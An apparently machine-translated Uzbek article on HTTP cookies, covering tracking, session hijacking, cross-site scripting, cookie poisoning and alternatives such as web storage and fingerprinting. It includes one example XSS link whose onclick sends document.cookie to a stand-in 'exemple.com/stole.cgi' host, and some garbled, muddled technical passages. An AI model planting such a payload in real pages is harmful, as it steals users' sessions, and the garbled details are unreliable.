Maxfiylikni oshirish va reklama kuzatuvini kamaytirish uchun uchinchi tomon cookie-fayllari ko'pchilik brauzerlar tomonidan bloklanishi mumkin, bu foydalanuvchining veb tajribasiga salbiy ta'sir ko'rsatmaydi. Ko'pgina reklama agentliklari bir variantni taklif qilishadi qatnashishdan voz kechish; obunani bekor qilish maqsadli reklama uchun, brauzerda ushbu nishonni o'chirib qo'yadigan umumiy cookie faylini o'rnatish orqali, lekin bunday yechim amalda samarali bo'lmaydi, chunki unga rioya qilinganda, bu umumiy cookie foydalanuvchi ushbu cookie-fayllarni o'chirishi bilanoq o'chiriladi, bu esa optsiyani bekor qiladi. qaror chiqarish.

Cookie-fayllarning kamchiliklari

Maxfiylik bilan bog'liq muammolardan tashqari, cookie-fayllar ham ba'zi texnik kamchiliklarga ega. Xususan, ular har doim ham foydalanuvchilarni aniq identifikatsiya qila olmaydi, ular ko'p sonli bo'lsa, ular sayt ishini sekinlashtirishi mumkin, ular xavfsizlik hujumlari uchun ishlatilishi mumkin va ular vakillik holatiga, dasturiy ta'minotning arxitektura uslubiga zid keladi.

Noaniq identifikatsiya

Agar kompyuterda bir nechta brauzer ishlatilsa, ularning har birida har doim cookie fayllari uchun alohida saqlash birligi mavjud. Shuning uchun cookie-fayllar shaxsni emas, balki foydalanuvchi hisobi, kompyuter va veb-brauzerning kombinatsiyasini aniqlaydi. Shunday qilib, har kim cookie fayllari bo'lgan ushbu hisoblar, kompyuterlar yoki brauzerlardan foydalanishi mumkin. Xuddi shunday, cookie-fayllar bir xil foydalanuvchi hisobini, kompyuterni va brauzerni baham ko'radigan bir nechta foydalanuvchilarni, masalan, "internet-kafelarda" yoki kompyuter resurslariga bepul kirish imkonini beradigan har qanday joyda farq qilmaydi.

Ammo amalda bu bayonot aksariyat hollarda noto'g'ri bo'lib chiqadi, chunki bugungi kunda "shaxsiy" kompyuter (yoki smartfon yoki planshet, bundan ham yomoni) asosan bitta shaxs tomonidan qo'llaniladi.Bu ma'lum bir shaxsga qaratilgan va to'plangan ma'lumotlar hajmi orqali, agar shaxs "aniq" identifikatsiya qilinmagan bo'lsa ham, shaxsiylashtirilgan maqsadlilikka erishadi.

Cookie tarmoqdagi boshqa kompyuter tomonidan o'g'irlanishi mumkin.

Oddiy ishlash vaqtida cookie-fayllar server (yoki bir xil domendagi serverlar guruhi) va foydalanuvchining kompyuter brauzeri o'rtasida qaytariladi. Cookie fayllari maxfiy ma'lumotlarni (foydalanuvchi nomi, autentifikatsiya uchun ishlatiladigan parol va boshqalar) o'z ichiga olishi mumkinligi sababli, ularning qiymatlari boshqa kompyuterlar uchun ochiq bo'lmasligi kerak. Cookie-fayllarni o'g'irlash - bu ruxsatsiz uchinchi shaxslar tomonidan cookie-fayllarni ushlash harakati.

Seansni o'g'irlash deb ataladigan hujumda cookie-fayllar paketli sniffer orqali o'g'irlanishi mumkin. Tarmoqdagi trafik jo'natuvchi va qabul qiluvchilardan boshqa kompyuterlar tomonidan ushlanishi va o'qilishi mumkin (ayniqsa, shifrlanmagan umumiy Wi-Fi maydonida). Ushbu trafik oddiy HTTP protokoli yordamida seanslar orqali yuborilgan cookie-fayllarni o'z ichiga oladi. Agar tarmoq trafigi shifrlanmagan bo'lsa, zararli foydalanuvchilar shu tariqa "paket sniffers" yordamida tarmoqdagi boshqa foydalanuvchilarning aloqalarini o'qishlari mumkin.

Ushbu muammoni HTTPS protokoli yordamida foydalanuvchi kompyuteri va server o'rtasidagi ulanishni shifrlash orqali bartaraf etish mumkin. Server a belgilashi mumkin xavfsiz bayroq cookie faylini o'rnatishda; brauzer uni faqat SSL ulanishi kabi xavfsiz liniya orqali yuboradi.

Biroq, ko'pgina saytlar, foydalanuvchi autentifikatsiyasi (ya'ni, kirish sahifasi) uchun HTTPS shifrlangan aloqadan foydalansa ham, samaradorlik uchun keyinchalik seans kukilari va boshqa ma'lumotlarni odatdagidek shifrlanmagan HTTP ulanishlari orqali yuboradi. Shunday qilib, tajovuzkorlar boshqa foydalanuvchilarning cookie-fayllarini tutib olishlari va ularni tegishli saytlarda taqlid qilishlari yoki cookie-fayllar hujumlarida foydalanishlari mumkin.

Saytda skript yaratish: faqat server va mijoz o'rtasida almashtirilishi kerak bo'lgan cookie boshqa uchinchi tomonga yuboriladi.

Cookie-fayllarni o'g'irlashning yana bir usuli - saytlarni skript qilish va brauzerning o'zi ularni hech qachon qabul qilmaydigan zararli serverlarga cookie-fayllarni yuborishdir. Zamonaviy brauzerlar serverdan kodning talab qilinadigan qismlarini bajarishga imkon beradi. Agar cookie-fayllarga ish vaqtida kirish mumkin bo'lsa, ularning qiymatlari ularga kirishi kerak bo'lmagan serverlarga qandaydir shaklda etkazilishi mumkin. Cookie-fayllarni tarmoq orqali yuborishdan oldin ularni shifrlash hujumning oldini olishga yordam bermaydi.

Ushbu turdagi saytdagi skriptlar odatda foydalanuvchilarga HTML-kontentni joylashtirishga imkon beruvchi saytlarda tajovuzkorlar tomonidan qo'llaniladi. Mos keladigan kodning bir qismini HTML hissasiga integratsiyalash orqali tajovuzkor boshqa foydalanuvchilardan cookie-fayllarni qabul qilishi mumkin. Ushbu cookie-fayllar haqidagi ma'lumotlardan o'g'irlangan cookie-fayllar yordamida bir saytga ulanish orqali foydalanish mumkin, shuning uchun cookie-fayllari o'g'irlangan foydalanuvchi sifatida tan olinadi.

Bunday hujumlarning oldini olish usullaridan biri HttpOnly bayrog'idan foydalanishdir; bu PHP-da Internet Explorer-ning 6-versiyasidan boshlab, 5.2.0 versiyasidan boshlab taqdim etilgan variant bo'lib, u skriptga yaqin mijoz uchun cookie-fayllardan foydalana olmaydigan qilib qo'yish rejalashtirilgan. Biroq, veb-ishlab chiquvchilar saytni ishlab chiqishda buni hisobga olishlari kerak, shunda ular saytdagi skriptlardan himoyalanishadi.

Ishlatilgan boshqa xavfsizlik tahdidi - bu saytda talabni ishlab chiqarish.

Rasmiy texnik spetsifikatsiya cookie fayllarini faqat ular kelib chiqqan domendagi serverlarga qaytarish imkonini beradi. Biroq, cookie-fayllarning qiymati cookie sarlavhalaridan boshqa vositalar yordamida boshqa serverlarga yuborilishi mumkin.

Xususan, JavaScript kabi skript tillari odatda cookie qiymatlariga kirishga ruxsat etiladi va Internetdagi istalgan serverga ixtiyoriy qiymatlarni yuborishga qodir. Ushbu skript yaratish qobiliyati foydalanuvchilarga HTML mazmunini boshqa foydalanuvchilar ko'rishi uchun joylashtirish imkonini beruvchi veb-saytlardan foydalaniladi.

Misol uchun, example.com domenida ishlayotgan tajovuzkor o'zlari nazorat qilmaydigan mashhur blogga ishora qiluvchi quyidagi havolani o'z ichiga olgan izoh qoldirishi mumkin:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Boshqa foydalanuvchi ushbu havolani bosganda, brauzer kodning onclick atribut qismini bajaradi, shuning uchun hujjat.cookie qatorini ushbu sahifa uchun faol foydalanuvchi cookie-fayllari ro'yxati bilan almashtiradi. Shu sababli, ushbu cookie-fayllar ro'yxati example.com serveriga yuboriladi va shuning uchun tajovuzkor ushbu foydalanuvchining cookie-fayllarini to'plashi mumkin.

Ushbu turdagi hujumni foydalanuvchi tomonidan aniqlash qiyin, chunki skript cookie faylini o'rnatgan bir xil domendan keladi va qiymatlarni yuborish operatsiyasi ushbu domen tomonidan ruxsat etilgan ko'rinadi. Zararli kodning nashr etilishiga to'sqinlik qiluvchi cheklovlarni o'rnatish ushbu turdagi saytlarni boshqaradigan ma'murlarning mas'uliyati hisoblanadi.

Cookie fayllari JavaScript kabi mijoz dasturlariga bevosita koʻrinmaydi, agar ular HttpOnly bayrogʻi bilan yuborilgan boʻlsa. Server nuqtai nazaridan, yagona farq shundaki, Set-Cookie sarlavhasi qatoriga HttpOnly qatorini o'z ichiga olgan yangi maydon qo'shilgan:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Brauzer bunday cookie-faylni olganida, uni odatda quyidagi HTTP almashinuvida ishlatishi kerak, lekin uni mijoz tomonida bajarilgan skriptlarga ko'rinmaydi. HttpOnly bayrog'i hech qanday rasmiy texnik spetsifikatsiyaning bir qismi emas va barcha brauzerlarda qo'llanilmaydi. E'tibor bering, hozirda XMLHTTPRequest usuli bilan seans kukilarini o'qish va yozishni oldini olishning hech qanday usuli yo'q.

Kontentni o'zgartirish: tajovuzkor serverga yaroqsiz cookie-faylni yuboradi, ehtimol server tomonidan yuborilgan haqiqiy cookie-fayldan yaratilgan.

Cookie-fayllar saqlanishi va serverga o'zgarmagan holda qaytarilishi kerak bo'lgan zahoti, tajovuzkor cookie-fayllarning qiymatini serverga qaytarib yuborishdan oldin o'zgartirishi mumkin. Misol uchun, agar cookie-faylda foydalanuvchi do'kon savatiga qo'yilgan narsalar uchun to'lashi kerak bo'lgan umumiy qiymatni o'z ichiga olsa, bu qiymatni o'zgartirish serverni tajovuzkordan boshlang'ich narxdan kamroq haq olish xavfiga duchor qiladi. Cookie-fayllarning qiymatini o'zgartirish jarayoni deyiladi pechene zaharlanishi va hujumni davom ettirish uchun cookie o'g'irlashdan keyin foydalanish mumkin.

Cookie-fayllarni bekor qilish usulida tajovuzkor serverga yaroqsiz cookie faylini yuborish uchun brauzer xatosidan foydalanadi.

Biroq, aksariyat veb-saytlar faqat seans identifikatorini - seans foydalanuvchisini aniqlash uchun foydalaniladigan tasodifiy yaratilgan noyob raqamni - cookie-faylning o'zida saqlaydi, qolgan barcha ma'lumotlar esa serverda saqlanadi. Bunday holda, bu muammo asosan hal qilinadi.

Har bir sayt o'z cookie-fayllariga ega bo'lishi kutilmoqda, shuning uchun bitta sayt boshqa sayt bilan bog'langan cookie-fayllarni o'zgartira olmasligi yoki yarata olmasligi kerak. Veb-brauzer xavfsizligidagi nuqson zararli saytlarga ushbu qoidani buzishga imkon beradi. Bunday kamchilikdan foydalanish odatda deyiladi saytlararo pishirish. Bunday hujumlarning maqsadi seans identifikatorini o'g'irlash bo'lishi mumkin.

Foydalanuvchilar ushbu zaifliklar deyarli yo'q qilingan veb-brauzerlarning so'nggi versiyalaridan foydalanishlari kerak.

Mijoz va server o'rtasidagi ziddiyatli holat

Cookie-fayllardan foydalanish mijozning holati va cookie-faylda saqlangan holat o'rtasida ziddiyat keltirib chiqarishi mumkin. Agar foydalanuvchi cookie-faylni qo'lga kiritsa va brauzerning "Orqaga" tugmasini bosgan bo'lsa, brauzer holati odatda ushbu xariddan oldingi kabi emas. Masalan, agar onlayn-do'kon savati cookie-fayllar yordamida yaratilgan bo'lsa, foydalanuvchi brauzer tarixiga qaytganida savat tarkibi o'zgarmaydi: agar foydalanuvchi o'z savatiga maqola qo'shish uchun tugmani bossa va "Qaytish" tugmasini bossa. " tugmasi, maqola shu maqolada qoladi. Bu, albatta, maqolani qo'shishni bekor qilmoqchi bo'lgan foydalanuvchining niyati bo'lmasligi mumkin. Bu ishonchsizlik, chalkashlik va xatolarga olib kelishi mumkin. Shunday qilib, veb-ishlab chiquvchilar ushbu muammodan xabardor bo'lishlari va bunday vaziyatlarni hal qilish uchun choralar ko'rishlari kerak.

Doimiy cookie-fayllar maxfiylik xavfsizligi bo'yicha mutaxassislar tomonidan tez orada tugamasligi uchun tanqid qilindi, bu esa veb-saytlarga vaqt o'tishi bilan foydalanuvchilarni kuzatish va ularning profilini yaratish imkonini beradi. Cookie-fayllarning bu jihati ham seansni o'g'irlash muammosining bir qismidir, chunki o'g'irlangan doimiy cookie-fayl uzoq vaqt davomida foydalanuvchi nomini o'zgartirish uchun ishlatilishi mumkin.

Bundan tashqari, o'qing: GAFAM: ular kimlar? Nega ular (ba'zan) juda qo'rqinchli?

Cookie fayllariga alternativalar

Cookie-fayllar yordamida bajarilishi mumkin bo'lgan ba'zi operatsiyalar cookie-fayllarni chetlab o'tadigan yoki o'chirilgan cookie-fayllarni qayta yaratadigan boshqa mexanizmlar yordamida ham amalga oshirilishi mumkin, bu esa maxfiylik muammolarini cookie-fayllarga qaraganda bir xil tarzda (yoki ba'zan ko'rinmas bo'lgani uchun yomonroq) yaratadi.

IP manzili

Foydalanuvchilarni sahifaga qo'ng'iroq qilayotgan kompyuterning IP manzili bilan kuzatish mumkin. Ushbu usul World Wide Web joriy etilgandan beri mavjud, chunki sahifalar yuklab olinganda server brauzer yoki proksi-serverda ishlaydigan kompyuterning IP-manzilini so'raydi, agar hech kim ishlatilmasa. Server ushbu ma'lumotni ishlatilayotgan cookie-fayllar bor yoki yo'qligini kuzatishi mumkin. Biroq, bu manzillar odatda cookie-fayllarga qaraganda foydalanuvchini identifikatsiyalashda ishonchli emas, chunki kompyuterlar va proksi-serverlar bir nechta foydalanuvchilar tomonidan baham ko'rilishi mumkin va bir xil kompyuter har bir ish seansida boshqa IP-manzilni olishi mumkin (masalan, telefon ulanishlari uchun tez-tez uchraydigan holat). .

IP-manzillar bo'yicha kuzatuv ba'zi holatlarda ishonchli bo'lishi mumkin, masalan, quvvat yoqilgan ekan, uzoq vaqt davomida bir xil IP-manzilni saqlaydigan keng polosali ulanishlar.

Tor kabi ba'zi tizimlar Internetning anonimligini saqlash va IP-manzil bo'yicha kuzatishni imkonsiz yoki amaliy bo'lmagan qilish uchun mo'ljallangan.

URL

Aniqroq usul ma'lumotni URL manzillariga joylashtirishga asoslangan. URLning so'rovlar qatori qismi odatda shu maqsadda qo'llaniladigan usullardan biridir, ammo boshqa qismlardan ham foydalanish mumkin. Agar cookie fayllari yoqilmagan bo'lsa, Java serverlet va PHP seans mexanizmlari ushbu usuldan foydalanadi.

Bu usul veb-server brauzerga yuborilganda uni olib yuradigan veb-sahifa havolalariga string so'rovlarini qo'shishni o'z ichiga oladi. Foydalanuvchi havolaga amal qilganda, brauzer biriktirilgan so'rovlar qatorini serverga qaytaradi.

Bu maqsadda foydalaniladigan soʻrovlar qatorlari va cookie fayllari juda oʻxshash, ikkalasi ham server tomonidan oʻzboshimchalik bilan tanlangan va brauzer tomonidan qaytarilgan maʼlumotlardir. Biroq, ba'zi farqlar mavjud: so'rovlar qatorini o'z ichiga olgan URL qayta ishlatilsa, xuddi shu ma'lumot serverga yuboriladi. Misol uchun, agar foydalanuvchining afzalliklari URL so'rovlar qatorida kodlangan bo'lsa va foydalanuvchi ushbu URLni boshqa foydalanuvchiga elektron pochta orqali yuborsa, u foydalanuvchi ham ushbu afzalliklardan foydalanishi mumkin bo'ladi.

Boshqa tomondan, agar foydalanuvchi bir sahifaga ikki marta kirsa, bir xil so'rovlar qatori ikkala marta ham ishlatilishiga kafolat yo'q. Misol uchun, agar foydalanuvchi birinchi marta ichki sayt sahifasidan sahifaga tushsa va ikkinchi marta tashqi sahifadan bitta sahifaga tushsa, sayt sahifasiga nisbatan so'rovlar qatori odatda boshqacha bo'ladi, cookie fayllari esa bir xil bo'ladi. .

So'rovlar satrlarining boshqa kamchiliklari xavfsizlik bilan bog'liq: so'rovlar satrlarida seansni identifikatsiya qiluvchi ma'lumotlarni saqlash seansni aniqlash hujumlarini, identifikatorga havola hujumlarini va boshqa ekspluatatsiyalarni faollashtiradi yoki soddalashtiradi. Seans identifikatorlarini HTTP cookie-fayllari sifatida uzatish xavfsizroq.

Yashirin shakl maydoni

ASP.NET tomonidan qo'llaniladigan seansni kuzatish shakllaridan biri yashirin maydonlarga ega veb-shakllardan foydalanishdir. Ushbu uslub ma'lumotni tashish uchun URL so'rovlari satrlaridan foydalanishga juda o'xshaydi va bir xil afzallik va kamchiliklarga ega; va agar forma HTTP GET usuli bilan qayta ishlansa, maydonlar shaklni yuborishda uni yuboradigan brauzer URL manzilining bir qismiga aylanadi. Lekin ko'pchilik shakllar HTTP POST bilan qayta ishlanadi, bu esa shakl ma'lumotlari, jumladan, yashirin maydonlar URLning bir qismi ham, cookie fayli ham bo'lmagan qo'shimcha kirish sifatida qo'shilishiga olib keladi.

Ushbu yondashuv kuzatuv nuqtai nazaridan ikkita afzalliklarga ega: birinchidan, URL manzili emas, balki HTML manba kodida joylashtirilgan ma'lumotlarni va POST kiritishni kuzatish oddiy foydalanuvchiga bu kuzatuvdan qochish imkonini beradi; ikkinchidan, foydalanuvchi URL-manzilni nusxalashda (masalan, sahifani diskda saqlash yoki elektron pochta orqali yuborish uchun) sessiya ma'lumotlari ko'chirilmaydi.

window.name

Barcha keng tarqalgan veb-brauzerlar DOMning window.name xususiyatidan foydalangan holda JavaScript orqali juda katta hajmdagi ma'lumotlarni (2MB dan 32MB gacha) saqlashi mumkin. Bu maʼlumotlardan seans cookie-fayllari oʻrniga foydalanish mumkin va domenlarda ham qoʻllaniladi. Texnika mijoz tomonidagi sessiya o'zgaruvchilari kompleksini saqlash uchun JSON ob'ektlari bilan birlashtirilishi mumkin.

Salbiy tomoni shundaki, har bir alohida oyna yoki yorliqda dastlab bo'sh window.name bo'ladi; yorliqlar bo'yicha ko'rishda (foydalanuvchi tomonidan ochilgan) bu alohida ochilgan yorliqlarda oyna nomi bo'lmaydi degan ma'noni anglatadi. Bundan tashqari, window.name maxfiylik muammosini keltirib chiqaradigan turli saytlar bo'ylab tashrif buyuruvchilarni kuzatish uchun ishlatilishi mumkin.

Bu ba'zi jihatlarda serverning ishtirok etmasligi sababli cookie-fayllarga qaraganda xavfsizroq bo'lishi mumkin, shuning uchun uni sniffer cookie-fayllarining tarmoq hujumiga daxlsiz qiladi. Biroq, agar ma'lumotlarni himoya qilish uchun maxsus choralar ko'rilsa, u keyingi hujumlarga qarshi zaifdir, chunki ma'lumotlar bir xil oynada ochilgan boshqa saytlar orqali mavjud.

HTTP autentifikatsiyasi

HTTP protokoli kirish autentifikatsiyasining asosiy protokollarini va kirish autentifikatsiyasi dayjestini o'z ichiga oladi, bu foydalanuvchi nomi va parolni bergan taqdirdagina veb-sahifaga kirish imkonini beradi. Agar server veb-sahifaga kirish huquqini berish uchun sertifikat so'rasa, brauzer uni foydalanuvchidan so'raydi va olingandan so'ng brauzer uni saqlaydi va barcha keyingi HTTP so'rovlariga yuboradi. Ushbu ma'lumotlar foydalanuvchini kuzatish uchun ishlatilishi mumkin.

Mahalliy umumiy obyekt

Agar brauzer Adobe Flash Player plaginini o'z ichiga olsa, mahalliy umumiy ob'ektlar cookie fayllari bilan bir xil maqsadlarda foydalanish mumkin. Ular veb-ishlab chiquvchilar uchun jozibali tanlov bo'lishi mumkin, chunki:

  • mahalliy umumiy ob'ekt uchun standart o'lcham chegarasi 100 KB;
  • xavfsizlik tekshiruvlari foydalanuvchi cookie-fayllarini tekshirishdan alohida (shuning uchun cookie-fayllar bo'lmaganda mahalliy umumiy obyektlarga ruxsat berilishi mumkin).

Ushbu oxirgi nuqta, cookie-fayllarni boshqarish siyosatini Adobe-ning mahalliy umumiy ob'ektlari siyosatidan ajratib turadi savollar tug‘diradi foydalanuvchi o'zining maxfiylik sozlamalarini boshqarishi haqida: u cookie fayllarini boshqarishi mahalliy umumiy ob'ektlarni boshqarishga ta'sir qilmasligini bilishi kerak va aksincha.

Ushbu tizimning yana bir tanqidi shundaki, uni faqat Adobe Flash Player plagini orqali ishlatish mumkin, u veb-standart emas, balki xususiydir.

Mijoz tarafidan qat'iylik

Ba'zi veb-brauzerlar skriptga asoslangan qat'iylik mexanizmini qo'llab-quvvatlaydi, bu esa sahifaga keyinchalik foydalanish uchun ma'lumotni mahalliy saqlash imkonini beradi. Masalan, Internet Explorer brauzer tarixi, xatcho'plar, XML formatida yoki to'g'ridan-to'g'ri diskda saqlangan veb-sahifadagi doimiy ma'lumotlarni qo'llab-quvvatlaydi. Microsoft Internet Explorer 5 uchun DHTML xatti-harakatlari orqali foydalanuvchi ma'lumotlari usuli mavjud.

W3C HTML 5 da veb-xotira deb nomlangan mijoz tomonidan ma'lumotlarni saqlash uchun yangi JavaScript API-ni taqdim etdi va cookie-fayllarni doimiy ravishda almashtirishni maqsad qilgan. Bu cookie-fayllarga o'xshaydi, lekin juda yaxshilangan sig'imga ega va HTTP so'rovlari sarlavhasida ma'lumot saqlamaydi. API veb-saqlashning ikki turiga ruxsat beradi: doimiy cookie-fayllar va seans cookie-fayllariga o'xshash mahalliy xotira va seans xotirasi (brauzer yopilganda seans cookie-fayllarining muddati tugaydi bundan mustasno) seans xotirasi yorliq yopilganda muddati tugaydi). Veb-xotira Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 va Opera 10.50 tomonidan qo'llab-quvvatlanadi.

Boshqa mexanizm odatda veb-sahifalardagi JavaScript dasturlari yordamida brauzerni keshlashga (yangilash o'rniga xotirada) tayanadi. 

Masalan, sahifada teg bo'lishi mumkin . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Bu vaqtda dastur kesh xotirasida qoladi va tashrif buyurilgan sahifa ikkinchi marta qayta yuklanmaydi. Shunday qilib, agar dastur global o'zgaruvchiga ega bo'lsa (masalan, var id = 3243242;), bu identifikator o'z kuchini saqlab qoladi va sahifa qayta yuklangandan keyin yoki dasturni bog'laydigan sahifa yuklangandan keyin boshqa JavaScript kodi tomonidan ishlatilishi mumkin. 

Ushbu usulning asosiy kamchiligi shundaki, JavaScript global o'zgaruvchisi statik bo'lishi kerak, ya'ni uni cookie fayli kabi o'zgartirish yoki o'chirib bo'lmaydi.

veb-brauzer barmoq izi

Brauzer barmoq izi identifikatsiya qilish uchun brauzerning konfiguratsiya sozlamalari haqida to'plangan ma'lumotdir. Ushbu barmoq izlari hatto cookie fayllari o'chirilgan bo'lsa ham, Internet foydalanuvchisini yoki qurilmani to'liq yoki qisman aniqlash uchun ishlatilishi mumkin.

Veb-brauzer konfiguratsiyasi haqidagi asosiy ma'lumotlar uzoq vaqtdan beri veb-sayt auditoriyasi xizmatlari tomonidan inson veb-trafigini aniq o'lchash va bosish firibgarligining turli shakllarini aniqlash maqsadida to'plangan. Mijoz tomonidagi skript tillari yordamida ma'lumot to'plash yanada aniqroq bo'ladi endi mumkin.

Ushbu ma'lumotni bit qatoriga aylantirish qurilma barmoq izini hosil qiladi. 2010 yilda Electronic Frontier Foundation (EFF) brauzerning barmoq izi entropiyasini hech bo'lmaganda o'lchadi. 18,1 bit, va bu tuval barmoq izlaridagi yutuqlar ushbu entropiyaga 5,7 bit qo'shilishidan oldin edi.

Muxtasar qilib aytganda, cookie fayllari

Cookie-fayllar veb-brauzer tomonidan veb-saytga tashrif buyuruvchining qattiq diskida saqlanadigan va tashrif buyuruvchi yoki ularning sayt bo'ylab sayohati haqidagi ma'lumotlarni yozib olish uchun (boshqa narsalar qatorida) foydalaniladigan kichik matnli fayllardir. Shunday qilib, veb-master tashrif buyuruvchining odatlarini tan olishi va har bir tashrif buyuruvchi uchun o'z saytining taqdimotini shaxsiylashtirishi mumkin; cookie-fayllar bosh sahifada qancha maqolani ko'rsatishni eslab qolish yoki hatto biron-bir shaxsiy shaxs uchun login ma'lumotlarini saqlab qolish imkonini beradi: tashrif buyuruvchi saytga qaytganida, endi uning nomi va parolini yozishi shart emas. tan olinadi, chunki ular cookie-faylda avtomatik ravishda o'qiladi.

Cookie-faylning ishlash muddati cheklangan, uni sayt dizayneri belgilaydi. Shuningdek, ular brauzerning yopilishiga to'g'ri keladigan saytdagi sessiya oxirida tugashi mumkin. Cookie-fayllar tashrif buyuruvchilarning hayotini osonlashtirish va ularga tegishli ma'lumotlarni taqdim etish uchun keng qo'llaniladi. Ammo maxsus usullar tashrif buyuruvchini bir nechta saytlarda kuzatib borish va shu bilan uning odatlari haqida juda keng ma'lumot to'plash va o'zaro tekshirish imkonini beradi. Ushbu usul cookie-fayllardan foydalanishga tashrif buyuruvchilarning shaxsiy hayotini buzadigan kuzatuv usuli sifatida obro'-e'tibor berdi, bu afsuski, texnik bo'lmagan sabablarga ko'ra foydalanishning ko'p hollarda haqiqatga mos keladi yoki foydalanuvchi kutganlarini hurmat qilmaydi. .

Ushbu qonuniy qo'rquvlarga javoban, HTML 5 mijoz tomonidan ma'lumotlarni saqlash uchun veb-saqlash deb ataladigan yangi JavaScript API-ni taqdim etadi, u ancha xavfsizroq va kukilarni almashtirishga qaratilgan.

Cookie fayllarini saqlash

Ba'zi brauzerlarda cookie-fayllarni tahrirlash oson, uning qiymatlarini qo'lda o'zgartirish uchun Notepad kabi oddiy matn muharriri kifoya qiladi.

Cookie fayllari brauzerga qarab turlicha saqlanadi:

  • Microsoft Internet Explorer har bir cookie faylini boshqa faylda saqlaydi;
  • Mozilla Firefox barcha cookie fayllarini bitta faylda saqlaydi;
  • opera barcha cookie fayllarini bitta faylda saqlaydi va ularni shifrlaydi (dasturiy ta'minot opsiyalaridan tashqari ularni o'zgartirish mumkin emas);
  • Apple Safari barcha cookie fayllarini bitta .plist kengaytmali faylida saqlaydi. O'zgartirish mumkin, lekin juda oson emas, agar siz dasturiy ta'minot imkoniyatlaridan o'tmasangiz.

Brauzerlar qo'llab-quvvatlashi kerak minimal :

  • 300 ta bir vaqtning o'zida cookie fayllari;
  • Cookie uchun 4 o;
  • Har bir xost yoki domen uchun 20 ta cookie.
[Jami: 0 Anglatadi: 0]

Tomonidan yozilgan Sharhlar muharrirlari

Mutaxassis muharrirlar jamoasi o'z vaqtlarini mahsulotlarni tadqiq qilish, amaliy testlarni o'tkazish, soha mutaxassislari bilan suhbatlashish, iste'molchilar sharhlarini ko'rib chiqish va barcha natijalarimizni tushunarli va keng qamrovli xulosalar sifatida yozish bilan o'tkazadilar.

Izoh qoldirish

Sizning elektron pochta manzilingiz e'lon qilinmaydi. Kerakli joylar belgilangan *

Siz nima deb o'ylaysiz?

384 ballari
Upvote Pastga tushish